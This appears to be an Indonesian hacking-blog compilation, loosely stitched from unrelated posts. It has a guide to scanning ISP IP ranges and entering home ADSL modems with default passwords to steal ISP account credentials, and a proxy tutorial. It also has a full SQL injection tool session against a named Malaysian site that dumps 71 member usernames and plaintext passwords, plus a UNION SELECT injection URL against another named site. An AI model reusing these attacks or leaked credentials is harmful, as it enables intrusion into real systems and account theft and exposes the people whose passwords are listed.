tolong kasih tau caranya ya?
http://www.sendspace.com/folder/8psx85
================= >> jangan hentikan kreasimu..!!
Tehnik Komputer Jaringan SMK Maskumambang 1 Dukun Gresik
Ini dia yang paling dicari-cari orang. Tak perlu repot-repot memikirkan bagaimana caranya meng-hack website sekolah, kamu tinggal liat aja video tutorial ini. Dijamin kamu bisa langsung ngerti deh, apalagi videonya opensource alias gratiss..tiss..tiss...
Eits, tapi sebelumnya kamu musti klik banner dari 000webhost.com yang ada di page tadi ato kamu bisa klik link http://www.000webhost.com/273027.html nah, setelah itu kamu musti jadi member 000webhost.com tadi.
Tenang aja, buat jadi member 000webhost.com kamu gak perlu bayar qo. Fasilitas dari 000webhost.com pun buaaanyak banget deh..
Nah, setelah kamu jadi member dari 000webhost.com en bikin blog dsana, kamu tinggal kirimin aja alamat blog kamu ke e-mail yang ada di hazardlogic.webuda.com tadi...
Gampang kan?
Enjoy it...!!!
=================================================================================================
download video, http://www.youtube.com/watch?v=CbhhgmK1cJk
Akhirnya gw pun masuk bersama sucks05 dan Ndhy (hacker bersaudara). Diwarnet ini gw gak ikutan maen tetapi hanya jadi penonton saja. Gw hanya mengamati 2 hacker bersaudara sedang chating dan mengamati kegiatan mereka di depan PC.
Tiba waktunya niat jahat timbul? (ini kerjaannya si sucks05) untuk mengakses modem warnet. Langsung aja si sucks05 buka mozilla browser terus memasukan IP gateway jaringan alias IP modem ADSL yaitu 192.168.1.1. Menu Loginpun timbul terus gw menyuruh si sucks05 untuk memasukan username dan password default sebuah modem yaitu user : admin; pass : admin (peran gw disini?.nih). Alhasil modem pun berhasil dimasuki, disitu gw ama sucks05 tertawa ngakak?.. dan berkata tembus uii? (dasar si sucks05 klo liat yang gituan jadi cabul alias cabi-imut-lucu).
Kami mengamati dan mencari konfigurasi modem tersebut untuk mendapatkan account speedy warnet tersebut. Saat itu file yang berisikan IP dan account speedynya dititipkan ke Ndhy, so gak bisa ditampilin deh.
Cerita tadi mengawali keinginan gw untuk melakukan scanning target modem ADSL dan melakukan testing pada beberapa modem ADSL yang terhubung dengan SpeedyTelkom. Untuk tau cerita selanjutnya, ikuti dan simak dengan baek? hehheheh
Berbekal sebuah aplikasi ?Advanced Port Scanner v1.0 Beta 1? untuk melakukan scanning terhadap IP dari SpeedyTelkom. Dan satu lagi gw harus online menggunakan mIRC untuk mencari IP TelkomSpeedy. Dalam artikel ini gw menyertakan dengan beberapa gambar yang mungkin bisa membantu anda dalam memahami aktivitas gw.
Langkah Pertama
Buka aplikasi ?mIRC? pilih server ?Dalnet? dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Dalnet Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning. Lihat gambar dibawah ini.
Langkah Kedua
Buka aplikasi ?Advanced Port Scanner v1.0 Beta 1? kemudian cari sebuah IP contoh 125.160.33.41 ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari “125.160.33.1-125.160.33.255″, jadi angka yang diambil hanya “125.160.33.� bukan “125.160.33.41″ dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.
Langkah Ketiga
Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda..
Gambar diatas merupakan login dari modem PROLINK type H9200.
Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkomspeedy.
Maka kita akan melihat tampilan seperti dibawah ini:
Untuk melihat password, cukup dengan klik kanan pada pop up diatas “view page source�. Kemudian cari kata “passwd�. Lihat hasil pada gambar berikut:
Dari hasil diatas dapat dicoba di situs TelkomSpeedy untuk menguji account yang telah gw dapat. Accountnya adalah 161101201848@telkom.net dan passnya tetap saya hidden kan demi menjaga privacy yang punya account.
Semua ini merupakan pembelajaran mengenai dunia hacking, penulis tidak bertanggung jawab atas kerusakan yang terjadi akibat penyalahgunaan artikel ini. Ini merupakan sebagian kecil dari scanning IP TelkomSpeedy yang saya dapat, masih banyak account speedy yang sudah saya masuki dan masih saya simpan, dimana kebanyakan accountya adalah speedy unlimited...
gak enak juga kalo lagi pas pengen surfing ke site favourite kita tapi ternyata kita kena banned IP. atau mungkin juga manfaatin proxy buat pentest ke website orang.
di tutorial ini,saya akan sedikit menjelaskan gimana cara mendapatkan proxy dan mengeceknya secara online dengan mudah.
tools :
1. web browser.
2. koneksi internet.
3. cemilan sambil nunggu report proxy yang bisa dipake.
url yang dibutuhin :
1. http://sh4dhckr.com/?cmd=proxy
2. http://www.checker.freeproxy.ru/checker/index.php
3. http://sh4dhckr.com/?cmd=ip
langkah-langkahnya mengecek proxy yang aktif adalah sebagai berikut :
1. masuk ke url pertama (http://sh4dhckr.com/?cmd=proxy) trus copy semua IP dan port yang tampil. xxx.xxx.xxx.xxx:yyyy << x=IP y=port
2. masuk ke url ke dua (http://www.checker.freeproxy.ru/checker/index.php) trus masukkin ke box "Place proxy list here: ".
3. tekan "Check Proxy!" trus biarin dulu web itu ngecek proxy mana yang bisa digunain.
langkah-langkah penggunaan di web browser adalah sebagai berikut :
1. copy salah satu hasil dari proxy yang bisa digunain (hasil dari url kedua).
2. masuk ke "Tools" - "Options" - "Advanced" - "Network" - "Settings"
3. pilih "Manual Proxy Configuration"
4. masukkan IP proxy ke "HTTP Proxy:" kemudian masukkan port proxy ke tab sebelah IP.
5. masuk ke url ketiga (http://sh4dhckr.com/?cmd=ip). jika hasil ip yang keluar sama dengan IP proxy yang keluar berarti semua berjalan dengan lancar. jika browser tidak mau terhubung ke site (no network connection) berarti proxy yang kita pakai tidak bisa digunakan.
NB :
berikut sebagian hasil yang saya dapat dari tutorial diatas.
210.243.157.250:3128
130.104.72.200:3128
195.242.99.89:80
80.74.110.149:80
site'a malingshit...
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561 --findcol
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] darkc0de URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5
[-] Done!
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dbs
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2
[0] ccs_myccs
[1] test
[-] 06:17:50
[-] Total URL Requests 4
[-] Done
Don't forget to check schemafuzzlog.txt
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --schema -D ccs_myccs
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "ccs_myccs"
[+] Number of Tables: 36
[Database]: ccs_myccs
[Table: Columns]
[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag
[-] 06:45:44
[-] Total URL Requests 315
[-] Done
Don't forget to check schemafuzzlog.txt
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dump -D ccs_myccs -T member -C id,username,password
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Dumping data from database "ccs_myccs" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71
[0] 1:cwtan:213:
[1] 2:fkyoon:jk45gb:
[2] 3:xtremecom:hasegawa:
[3] 4:kevinloh:nbv354:
[4] 5:jasonwong:vgb54n:
[5] 20:jeffery_yeoh:sc8bq1:
[6] 7:gtlau:fv62bx:
[7] 8:johan:ndxm532:
[8] 9:mohamed:hdx43n:
[9] 10:johnathan:jsch82d:
[10] 11:jamesgoh:s45xh2:
[11] 34:sean:dsc23:
[12] 13:phchan:ph118:
[13] 14:pccmy:suc51f:
[14] 23:ckphuah:s45f8:
[15] 15:cg-computers:hdxe45:
[16] 16:armen:h2dz52:
[17] 17:matthew:sc25x3:
[18] 18:kyzee:ds5jk7:
[19] 19:george:dh9n2m:
[20] 31:wooijin:wooijin:
[21] 22:raymond-liew:sf28b:
[22] 24:andrewgark:sc19nv:
[23] 25:jamil:sdc739:
[24] 26:irene_tew:kxn349:
[25] 27:chenlung:xun329:
[26] 28:ericlim:un39xv:
[27] 29:tradewinds:sdcb348:
[28] 30:myben:830712b:
[29] 32:brian:jxn267:
[30] 39:elongnet:ds5x8:
[31] 40:shabbir:scvs321h:
[32] 41:evergreen:sdfx125:
[33] 43:raymondlee:xh37b3:
[34] 44:cheryl:bds518:
[35] 45:gadgetzone:asd24h:
[36] 46:dmitri:gb536:
[37] 47:syedali:21gh4:
[38] 48:level3:213:
[39] 49:izmir:hgd752:
[40] 50:izwan:fhdr352:
[41] 51:ooigheetiong:njds641:
[42] 52:thenoiho:dsh629k:
[43] 53:desai:kdie83:
[44] 54:giapseng:sx4k8:
[45] 55:lionel:lionel6:
[46] 56:adrain:
[47] 57:iscc:nhfd63:
[48] 58:rovinlim:sdx413:
[49] 59:maxlee:fkpq134:
[50] 60:syukri:t5u7w2:
[51] 61:jaclyn:vgx216:
[52] 62:davidteoh:tr431k:
[53] 63:yeapch:dx164:
[54] 64:adrianquah:fgzu72:
[55] 65:jameskuick:sg623k:
[56] 66:raymondooi:she369:
[57] 67:cgcomputers:gxk518:
[58] 68:yckai:jh763:
[59] 80:lltan:x41jk8:
[60] 70:kltan:sdk327:
[61] 71:myitech:hgk967:
[62] 72:vss:fxs523:
[63] 73:atconsulting:sc42h6:
[64] 74:skfcomp:sd15h6:
[65] 75:hjwang:crdy483:
[66] 76:cheoh:peb357:
[67] 77:saidatul:sdt528:
[68] 78:shofi:sx39n43:
[69] 79:dynacomb:x4f5k2:
[70] 81:lltan:x41jk8:
[71] No data
[-] 06:55:38
[-] Total URL Requests 73
[-] Done
Don't forget to check schemafuzzlog.txt
Selanjut'a....
register jadi member'a...
(soal'a halaman login bwt member d sembunyiin)
trus login sebagai member yg username 'n password'a dah kita dpt itu...
Yang Pengen Bikin Web Professional Disini
http://www.lynkdate.co.uk/forums/forums.asp?iFor=1
trus dia keluar seperti ini
http://www.lynkdate.co.uk/forums/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users